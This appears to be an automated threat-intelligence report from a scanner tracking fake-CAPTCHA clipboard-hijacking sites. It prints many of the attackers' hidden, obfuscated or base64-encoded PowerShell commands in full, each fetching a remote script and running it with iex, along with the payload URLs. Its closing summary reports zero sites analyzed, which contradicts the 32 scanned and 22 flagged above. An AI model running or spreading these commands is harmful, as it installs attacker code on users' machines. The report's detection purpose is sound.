Threat Intelligence Report

📅 June 16, 2025 🕒 Generated: 2025-06-16 02:52:19 🔍 Sites Analyzed: 32
🌐
32
Total Sites Analyzed
⚠️
22
Malicious Sites
69.0% detection rate
💻
18
PowerShell Commands
📋
50
Clipboard Hijacks
📊
83
Avg Threat Score

Attack Pattern Analysis

34
High Risk Commands
27
Base64 Encoded
0
Obfuscated JS
0
Inline JS Redirects
0
External JS Chains
0
Redirect Follows
PowerShellCommands 18
EncodedPowerShell 0
ClipboardManipulation 34
ObfuscatedJavaScript 0
Base64Strings 27
JavaScriptRedirects 0
JavaScriptRedirectChains 0
RedirectFollows 0
CaptchaElements 291

Top Indicators/Keywords

<script> (22) I'm not a robot (17) ✅ (16) I am not a robot (16) reCAPTCHA Verification (16) To better prove you are not a robot (15) Verification ID (14) Verify You Are Human (12) Verification Hash (3) _0x (2)

Malicious Sites Detected

Click on a site to view detailed analysis
http://185.196.8.60/
20 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
1
clipboard
10
captcha
4
base64
1
high risk commands

💻 PowerShell Commands 1

powershell -w h powershell 'cu%%%r%l% %%http%%://safty%%%pl%%a%ce%.%c%%om/1%%5151%%%%.t%%%%x%%%t%%% |%%% %%%%iex%'.replace('%','')# Verification ID: 5932");

🔍 Suspicious Keywords 4

Verification ID
I'm not a robot
navigator.clipboard.writeText
<script>

📋 Clipboard Manipulation Code

Showing first 1 of 1 entries (truncated for performance) 

...= ""; } function copyToClipboard() { navigator.clipboard.writeText ("powershell -w h powershell 'cu%%%r%l% %%http%%://sa...
https://riverview-pools.com/verify/index.html
27 indicators detected
Score: 90 PowerShell Clipboard Hijacking
2
powershell
3
clipboard
1
downloads
14
captcha
2
high risk commands

💻 PowerShell Commands 2

powershell " + htaPath;
iex (irm 'https://aatox.com/verify/45.ps1')

🔍 Suspicious Keywords 8

Command
I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://aatox.com/verify/45.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://blessdayservices.org/up/
26 indicators detected
Score: 90 PowerShell Clipboard Hijacking
2
powershell
3
clipboard
3
downloads
14
captcha
4
high risk commands

💻 PowerShell Commands 2

powershell -ArgumentList '-w hidden -c iwr https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1 | iex' -WindowStyle Hidden\"";
powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://irp.cdn-website.com/45d8c6e0/files/uploaded/32.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://jessespridecharters.com/v/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
3
downloads
14
captcha
3
high risk commands

💻 PowerShell Commands 1

powershell " + htaPath;

🔍 Suspicious Keywords 7

I am not a robot
Verification Hash
reCAPTCHA Verification
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 5

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/
https://yogasitesdev.wpengine.com/2/15.ps1

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://mail.lucprofessional.com.br/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://test.peperoncinochepassione.it/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.website.mypetapp.co.za/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.lucprofessional.grupomoltz.com.br/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://thesignaturemag.salviatech.com/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.bratusferramentas.grupomoltz.com.br/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://website.mypetapp.co.za/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://horno-rafelet.es/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://lucprofessional.grupomoltz.com.br/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.thesignaturemag.salviatech.com/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://www.test.peperoncinochepassione.it/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
https://my.salviatech.com/
25 indicators detected
Score: 90 PowerShell Clipboard Hijacking
1
powershell
3
clipboard
1
downloads
12
captcha
1
base64
2
high risk commands

💻 PowerShell Commands 1

PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;

🔍 Suspicious Keywords 8

I am not a robot
Verification ID
reCAPTCHA Verification
Verify You Are Human
To better prove you are not a robot
I'm not a robot
<script>

🌐 Extracted URLs 3

https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css
https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...y.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempText...
http://101.32.40.22/
20 indicators detected
Score: 90 Clipboard Hijacking Fake CAPTCHA
3
clipboard
11
captcha

🔍 Suspicious Keywords 6

I am not a robot
Verification ID
reCAPTCHA Verification
I'm not a robot
<script>

🌐 Extracted URLs 4

https://use.fontawesome.com/releases/v5.0.0/css/all.css
https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png
https://www.google.com/intl/en/policies/privacy/
https://www.google.com/intl/en/policies/terms/

📋 Clipboard Manipulation Code

Showing first 2 of 2 entries (truncated for performance) 

...); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextArea); }...
...dy.append(tempTextArea); tempTextArea.select(); document.execCommand("copy"); document.body.removeChild(tempTextAr...
https://staplebrokenmetaliyro.blogspot.com/
55 indicators detected
Score: 90 Clipboard Hijacking Fake CAPTCHA
1
clipboard
47
captcha

🔍 Suspicious Keywords 7

<script>
\x3d
\x3c
\x22
\x3e
\x27
display:none

🌐 Extracted URLs 46

http://www.w3.org/1999/xhtml
http://www.google.com/2005/gml/b
http://www.google.com/2005/gml/data
http://www.google.com/2005/gml/expr
https://electricreport.org/ygd4g

📋 Clipboard Manipulation Code

Showing first 1 of 1 entries (truncated for performance) 

...ync' src='https://www.gstatic.com/external_hosted/clipboardjs/clipboard.min.js'></script> <meta name='google-adsense-platform-account' content='ca-hos...
http://91.212.166.205/
21 indicators detected
Score: 60 Fake CAPTCHA
12
captcha
5
base64

🔍 Suspicious Keywords 4

<script>
_0x
atob(
document.write
http://91.212.166.204/
20 indicators detected
Score: 60 Fake CAPTCHA
12
captcha
4
base64

🔍 Suspicious Keywords 4

<script>
_0x
atob(
document.write

Showing top 20 malicious sites. 2 additional sites detected.

Technical Analysis

ClickGrab Threat Analysis Report - 2025-06-16

Generated on 2025-06-17 13:41:02

Executive Summary

  • Total sites analyzed: 0
  • Sites with malicious content: 0
  • Unique domains encountered: 0
  • Total URLs extracted: 0
  • PowerShell download attempts: 0
  • Clipboard manipulation instances: 0

Domain Analysis

Most Frequently Encountered Domains

URL Pattern Analysis

Attack Pattern Reconstruction

Key Findings

  1. Prevalence: 0.0% of analyzed sites contained malicious content
  2. Primary Attack Vector: Fake CAPTCHA verification leading to clipboard hijacking
  3. Target Platform: Windows systems via PowerShell execution
  4. Social Engineering: Sophisticated UI mimicking legitimate Google reCAPTCHA

Recommendations

  1. User Education: Warn users about fake CAPTCHA verification schemes
  2. Clipboard Monitoring: Implement clipboard monitoring for suspicious PowerShell commands
  3. URL Filtering: Block known malicious domains identified in this analysis
  4. PowerShell Execution Policy: Restrict PowerShell execution in corporate environments